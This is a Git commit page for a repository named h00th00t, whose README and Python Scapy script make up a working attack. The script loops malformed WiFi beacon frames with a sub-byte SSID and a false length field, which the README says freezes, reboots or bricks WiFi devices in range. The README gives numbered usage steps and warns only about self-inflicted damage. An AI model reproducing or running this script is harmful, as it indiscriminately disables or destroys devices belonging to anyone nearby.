PrincessPi/h00th00t
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

waypoint

Browse Source
This commit is contained in:
Princess Pi
2025-08-08 13:51:11 -06:00
parent ffcd079a08
commit 7d73861153
2 changed files with 30 additions and 16 deletions
Download Patch File Download Diff File Expand all files Collapse all files
README.md
+9 -6
View File
@@ -1,7 +1,8 @@
# h00th00t # h00th00t
## Sub-Byte Binary Underflow in WiFi Devices ## Sub-Byte Binary Underflow in WiFi Devices
## Warning: Test With Extreme Care ## Warning: Test With Extreme Care
### Summary ### Warning: USE AT YOUR OWN PERIL
## Summary
Sending WiFi beacons where the SSID is set to some non-byte number of bits and a poorly matching SSID length breaks many random WiFi devices in range. Sending WiFi beacons where the SSID is set to some non-byte number of bits and a poorly matching SSID length breaks many random WiFi devices in range.
Some devices freeze, some reboot, some break, some brick. Some devices freeze, some reboot, some break, some brick.
@@ -19,10 +20,12 @@ Testing is very challenging as it requires being out of range of all other WiFi
## Hooting (usage) ## Hooting (usage)
**DO NOT TEST IN RANGE OF ANY DEVICE YOU ARE UNWILLING TO DAMAGE** **DO NOT TEST IN RANGE OF ANY DEVICE YOU ARE UNWILLING TO DAMAGE**
1. Install [Scapy](https://scapy.readthedocs.io/en/latest/installation.html) 1. Designed for **linux** environments with **python3**
2. Uncomment line `19` of [h00thoot.py](./h00th00t.py) 2. Optional: edit line `4` and `5` of [h00thoot.py](./h00th00t.py) to match your sender and wifi device preferences
3. `python h00th00t.py` * Defaults are fine for most purposes
3. Install [Scapy](https://scapy.readthedocs.io/en/latest/installation.html)
4. Uncomment line `19` of [h00thoot.py](./h00th00t.py)
5. `python h00th00t.py`
* in some linux environments, sudo may be needed `sudo python h00th00t.py`
--- ---
![Stolas uwu~](./stolas-headdesk.gif) ![Stolas uwu~](./stolas-headdesk.gif)
h00th00t.py
+21 -10
View File
@@ -1,19 +1,30 @@
from scapy.all import * from scapy.all import *
# config your stuff here # config your stuff here
iface = 'wlan1' iface = 'wlan0'
sender = RandMAC() sender_bssid_mac = RandMAC() # used for source mac and bssid
# send raw wifi beacon frames # send raw wifi beacon frames
def beacon_raw(SSID, length=255): ## USAGE:
dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=RandMAC(), addr3=RandMAC()) ### beacon_raw(<SSID>, <REPORTED SSID LENGTH IN 8 BIT BYTES>, <INTERVAL IN SECONDS>)
beacon = Dot11Beacon() ### or
essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=length) ### beacon_raw(SSID=<SSID>, reported_length=<REPORTED SSID LENGTH IN 8 BIT BYTES>, interval_seconds=<INTERVAL IN SECONDS>)
frame = RadioTap()/dot11/beacon/essid ## DEFAULTS:
### SSID="DUMMY SSID"
### reported_length=255
### interval_seconds=0.250
def beacon_raw(SSID="DUMMY SSID", reported_length=255, interval_seconds=0.250):
# addr1 is destination (broadcast), addr2 is the source mac, addr3 is the bssid
dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender_bssid_mac, addr3=sender_bssid_mac) # set the frame settings
beacon = Dot11Beacon() # create the beacon
essid = Dot11Elt(ID='SSID',info=RawVal(SSID), len=reported_length) # magic really happens here with Scapy's RawVal() function and the reported_length
frame = RadioTap()/dot11/beacon/essid # assemble the frame
print("FIRIN MY LAZORRRRRR") print("FIRIN MY LAZORRRRRR")
sendp(frame, iface=iface, inter=0.250, loop=1) sendp(frame, iface=iface, inter=interval_seconds, loop=1) # send on loop
# this can be most any value really experimentation is needed
ssid_binary = 0b0101 # a few random bits to send as the SSID ssid_binary = 0b0101 # a few random bits to send as the SSID
# please be careful with this, it can crash your local wifi devices # please be careful with this, it can crash or damage your local wifi devices
# beacon_raw(ssid_binary, length=255) # send it # beacon_raw(ssid_binary) # send it! USE WITH EXTREME CARE